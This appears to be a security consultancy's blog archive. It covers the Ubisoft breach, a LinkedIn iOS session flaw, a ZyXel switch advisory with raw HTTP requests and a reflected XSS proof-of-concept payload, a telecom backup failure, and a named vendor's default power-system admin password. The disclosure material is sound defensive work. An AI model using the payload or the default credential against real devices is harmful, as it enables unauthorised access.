Blog « IT Security Geeks

It’s all over the news that Ubisoft got hacked, and I’m sure that a lot of people are sitting back wondering just what the effects of this hack are, and how it affects them.

To sum things up, below is the content of one of the “Password Reset” e-mails that Ubisoft sent out yesterday.

“Dear Member,

We recently found that one of our Web sites was exploited to gain unauthorised access to some of our online systems. We instantly took steps to close off this access, investigate the incident and begin restoring the integrity of any compromised systems.

During this process, we learned that data had been illegally accessed from our account database, including user names, email addresses and encrypted passwords. Please note that no personal payment information is stored with Ubisoft, meaning your debit/credit card information was safe from this intrusion.

As a result, we are recommending that you change the password for your account: <your name here>

To enter your new password, click the link below: <removed>

Out of an abundance of caution, we also recommend that you change your password on any other Web site or service where you use the same or a similar password.

You can find more information here <removed>

For any additional support enquiries, please contact our customer service via our support web site at https://support.ubi.com

We sincerely apologise to all of you for the inconvenience. Please rest assured that your security remains our priority.

The Ubisoft team”

So your credit/debit card information may be safe, as Ubisoft don’t store this information (thankfully!), but the important part of the e-mail is the line that states:

“Out of an abundance of caution, we also recommend that you change your password on any other Web site or service where you use the same or a similar password.”

If like many millions of people out on the Internet, you’ve used the same password on other web sites, when the hackers eventually crack the encrypted passwords, they will then have your e-mail address and password. Imagine the damage they could cause to your life through websites like Facebook, Twitter, LinkedIn, PayPal, Amazon, eBay, the list goes on and on.

It’s never about attacking a single web site, until people learn that using the same password all over the Internet is not a good idea, this will never change unfortunately.

If you have a Ubisoft account and even if you only use it for gaming, go and change all your other passwords on any other web sites where you’ve used the same password immediately. Just because this data was stolen recently, it doesn’t mean that it will all be used any time soon. You may only notice someone else logging into one or more of your accounts a year down the line. While you’re changing those passwords, it may be a good time to make sure that you’re not using a different “same” password on multiple other web sites or applications.

Unfortunately a lot of the time attacks such as these can be prevented with proper security measures and regular “real world” penetration tests. We always advise our clients to conduct penetration testing on a regular basis, and always before launching any new Internet facing services or web sites. We also always advise our clients to maintain a strong Password Policy.

Every now and then one of our readers will send in a link to an article that we just have to share.

A really special thank you to Brandi from all of us here at ITSG for sending this one through.

To Heather over at Backgroundchecks.org, really nice article!

So for everyone who wants to get a better understanding of what Social Engineering (S.E) is, go and have a read of the following article.

“Working With People An Introduction To Social Engineering.“

We’re pleased to finally announce that we are now operating in both the UK and South Africa. This has been a long time in the making, and we’re now ready.

Our full compliment of services is now available on both continents.

Our contact details will remain the same in the interim, however we are in the process of getting a local phone number in South Africa.

At present http://www.itsecuritygeeks.co.za is pointing to our main website, if this changes, we will update you here first.

Thank you once again to all our clients for making this a reality.

So we’ve decided to expand our team at ITSG, the full job specifications can be found on our Careers page here.

If you don’t feel that you meet all the requirements, but feel that you’re very close, or have something unique to offer to our team, then please do get in touch. We are looking for both permanent and contract roles.

We hope to hear from you soon.

We have tried to contact LinkedIn via two mediums, their social media service and twitter. We have as yet received no response regarding our communications. We have subsequently decided that we ought to alert people to this.

On the morning of 07/06/2012 an I.T. Security geeks team member changed his LinkedIn password.

The changes were implemented via a web browser.

Several hours later the user received an app store notification of a LinkedIn app update for an IOS device; and proceeded with the  update to LinkedIn version 5.0.3 dated 06/06/12.

User was however still able to view and functionally use the LinkedIn app despite not being authenticated with the new password on his mobile device.

It appears that when passwords are changed on site, the revocation of access and subsequent re-authentication of all previously authenticated devices in the user’s access matrix does not occur.

To test the theory again, user logged back into LinkedIn via web browser, changed his password and then used the IOS device in question to post a test status to his own profile and to send a message to a connection.

Despite 2 password changes, the IOS device still maintains its active session and allowed full compromise to the users account.

This poses a high risk to users.

Personal Data may be compromised.

Users cannot effectively revoke access to their profiles by changing passwords in the event of their devices being lost or stolen. If you have in the past attempted to lock out unauthorised user access on a lost or stolen device by changing your password, please be aware that this does not seem to work. Try to contact LinkedIn to assist. Our best possible advice is to uninstall the LinkedIn IOS application until further notice.

A few of weeks ago, one of the vulnerabilities that we identified was publicly released on Upsploit.com. These vulnerabilities were discovered in our testing environment while playing around with a ZyXel GS1510 ethernet switch.

This advisory was publicly released on the 2012-03-14 12:57:15 with an Upsploit reference of UPS-2011-0042.

The vulnerabilities that were discovered where the following:

1. The cookie for the admin user of the switch stored both the admin username password in clear text within the cookie.

2. The passwords of any users logging into the switch were being submitted in clear text over HTTP via the following form:

http://192.168.1.5/webctrl.cgi

HTTP Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting

The payload fe07b</title><script>alert(xss)</ script>b7e71e54af6 was submitted in the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response, as can be seen below.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response.

Request

GET /images/?fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;b7e71e54af6=1 HTTP/1.1 Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Date: Sun, 18 Sep 2011 16:30:14 GMT Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT Accept-Ranges: bytes
Connection: close
&lt;HTML&gt;
&lt;HEAD&gt;&lt;TITLE&gt;Index of /images/?fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;b7e71e54af6=1&lt;/TITLE&gt;&lt;/HEAD&gt; &lt;BODY BGCOLOR=&quot;#99cc99&quot; TEXT=&quot;#000000&quot; LINK=&quot;#2020ff&quot; VLINK=&quot;#4040cc&quot;&gt;
&lt;H2&gt;Index of /images/?fe
…[SNIP]…

Congratulations go out to Neil Fryer for identifying and reporting this issue.

We would also like to extend out gratitude to the staff at ZyXel and also the guys at Upsploit.com for working with us to get these vulnerabilities patched in a timely manner.

This is just another reason why it’s always a good idea to have a penetration test or at the very least a vulnerability assessment conducted on all new devices that will be deployed within your organisations network.

If you would like any details on our device security testing or penetration testing services please feel free to contact us.

Loss of data and system downtime is a problem. For most people reading this, this is a self evident truth. Though what I find “on-the-ground” is a wholly different and unsavoury matter altogether.

I was recently socialising off-the-clock with a few folks in the telecommunications industry and a story was relayed to me. A story that prompted me to clock in as a security professional to offer advice and guidance, as I could not in good conscience let it pass without at least pointing a few things out.

During the course of the week starting 19/03/12, an operating company of a very large mobile operator experienced a system outage.

The system outage impacted the operators soft revenue generation mechanism (Call completion to terminating subscriber when subscriber is IMSI detached) for a significant portion of that region’s subscriber base. It happens. Hardware does not last forever. In particular, hard drives have a limited lifespan. How you prevent widespread impact of drive losses is well known. Effective storage system design, a hardline approach to backups as well as competent intervention teams (vendor and operator) and system re-engineering as a result of effective problem management.

By time I had heard about the problem, it was still ongoing and had been for days and had been attributed to a “Known Error” which had occurred many times in the past on this vendor’s product line.

The vendor field intervention team reacted to the client report and reverted back to their global support center. A JBOD had failed.

Recommended intervention which would not have resolved the outage, cemented the problem by corrupting the root filesystem. This further aggravated the outage by introducing further system failures. This “Known Error” had clearly not been effectively documented in the vendor’s knowledge base, nor had it been addressed with effective problem management despite it’s prior occurrence globally. Nor was the senior support person assisting the incident response team sufficiently qualified to deliver support.

The last backup performed was 2 years prior, and when it was restored, did not work – I won’t go into why, but I will say the 2010 backup was not sane and therefore useless and essentially not a backup.

Not only was there no backup policy in place for a production system. Which in itself is a violation of the operator’s mandate for systems under control of Vendor Managed Services, but for years the field teams did not follow internal Field Change procedures laid out i.e. Backups before and after implementation of Field Change Orders – several Change Orders had been implemented in the past two years.

A sad state of affairs. Fortunately, this problem could have been resolved with a few more hours of work and a sound understanding of Unix. On a system that is built around 4 Unix boxes, a number of Linux machines, and a few instances of a Real Time OS’, one would expect incident response teams to be knowledgable or have the means to solve these problems within the team. They could not; and subsequently a senior vendor resource had to be flown in to the region unnecessarily, at great expense (long haul flight, hotel, per diem) to perform the rebuild. A rebuild that could have been procured on a day rate from skilled resources in region at a fraction of the overall cost and with a quicker turn-around time.

So, we have a loss of operator revenue, data, reputation and a severe impact on vendor operational expenditure and reputation.

All of this is simply a compounded effect of:

• Poor procedure
• Lack of stakeholder oversight
• Poor Service Level Agreement management
• Poor risk analysis and impact assessments associated with Managed Service contracts
• Low cost and arguably inadequate resources tied to Managed Services
• Absence of training and development of aforementioned resources
• Lack of regular, independent assessment and testing of Managed Services capabilities
• Lack of regular, independent assessment and testing of Vendor Support mechanisms

The requirement of a well defined penetration testing program is more than just testing your estate from Cyber Attack. It’s about identifying all vulnerabilities in your operation, be they physical, technical or human in nature. Penetration testing needs to be a full time consultancy covering all aspects of your business, no matter what.

McAfee’s latest proof-of-concept showed the ability to seriously injure someone with a direct cyber attack. This involved an attack on an insulin implant pump. The pump could be induced to fully discharge it’s contents. In a diabetic, this will cause hypoglycæmia. This may result in death or brain damage if prolonged.

We’d like to congratulate Barnaby Jack for bringing attention to this.

We at I.T. Security geeks have long held the belief that this sort of thing is possible. While our focus has largely been directed at conventional, common place vulnerabilities we spend a fair amount of time working with obscure appliances and identifying issues with those products.

In my own area of influence, I’ve exploited rectifiers in controlled circumstances to effect power failures and fires (Easier than Jack’s Medtronic exploit, as you really don’t need to have much knowledge and most rectifiers are deployed with factory default PIN codes for administrator access). Don’t believe me? One of the world’s foremost suppliers of DC power systems has a default password for the user: “Admin” that is: “1”

Yes, the number 1.

I have personally accessed production power systems in operators where this default was discovered, and upon making my recommendations for immediate action was told, “No. We keep it like that to make it easier for our technicians.” or “We don’t perceive a problem with that.”

No perceived problem? How so? The manual for this particular device tells me:

The User has full access to all menus; including update the OS application and modifying, adding, and deleting Users.

Via the WEB Interface, a User (with proper access level) can:

View real-time operating information (rectifiers, converters, AC, DC, Batteries, etc.).

View and download information recorded in logs.

Send control commands.

Set programmable parameters.

Download and upload configuration files.

Download firmware to the Controller.

Curious, is it not?

I truly guarantee that if you are a telecommunications operator or co-location provider, you have this vendor’s product somewhere in your network. Call us to chat.

Smart grids are being hailed as a potential solution to the impending energy supply problems the world will face over the coming years.

The intent is to intelligently manage use in accordance with supply and alter tariffs to drive healthy usage patterns; Fair enough. It’s clever business welcomed by all, that is if we ignore the obvious high cost of delivery.

Accounting and sentiment aside, the real issue we see is the inherent risk in creating a management network such as a smart grid.

Many current investigations into the technology, as well as planned deployments tout trendy capabilities.

Mobile device compatibility i.e. the ability to control your homes appliances remotely to take advantage of low tariff times. Despite the obvious limitations in the theory, I am somewhat surprised that this is even being thought of anywhere; that is anywhere with an eye on Health and Safety.

Random and malicious attacks on grid residents could compromise authentication details in a number of ways and while mischief and damage could result, the same problem exists elsewhere where damage would be so much more significant.

Mobile Network Infrastructure 

In the ever demanding economic climate, many telecommunications operators across the globe have invested significantly in expenditure reduction programs.

In one way or another, smart meters are finding themselves part and parcel of a mobile network for this reason. Smart meter solutions get installed with relays for cutting supplies of energy, allowing to switch energy sources or disconnecting of subtended devices such as network equipment.

In almost all cases, solutions are scoped in a manner that gives very little consideration to direct attack scenarios. It is a fact most solutions are sold on the basis of cost savings, unified control and management capabilities and not security. If we are learning one thing of late, it is co-ordinated infrastructure attacks are possible and happening as we speak. We are also certain Iranian Nuclear Enrichment facilities are a lot harder to penetrate than your average mobile operator and it was done with impunity and anonymity.

It’s not all doom and gloom though, our high value penetration testing team at I.T. Security geeks can help. Contact us for more information.

We have recently added a button to the side of our web site for people to click and donate directly via PayPal to the Brad Smith fund, as we can’t imagine what his family must be going through right now.

For those readers who don’t know who Brad Smith is, he’s a talented and humorous security professional, who also goes by the online name of the “theNurse”.

During Brad’s presentation at the Hacker Halted conference in Florida, he suffered from a massive stroke and has been in a coma in hospital since then.

The guys over at Social-Engineer.org along with @humanhacker set up this donation for Brad’s family to assist with any out of pocket expenses that they have.

We couldn’t haven’t worded this better, so to quote the guys over at Social-Engineer.org

“Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. ”

SocialEngineer.org have a update page up and running with updates from Brad’s wife Nina, which can be found here.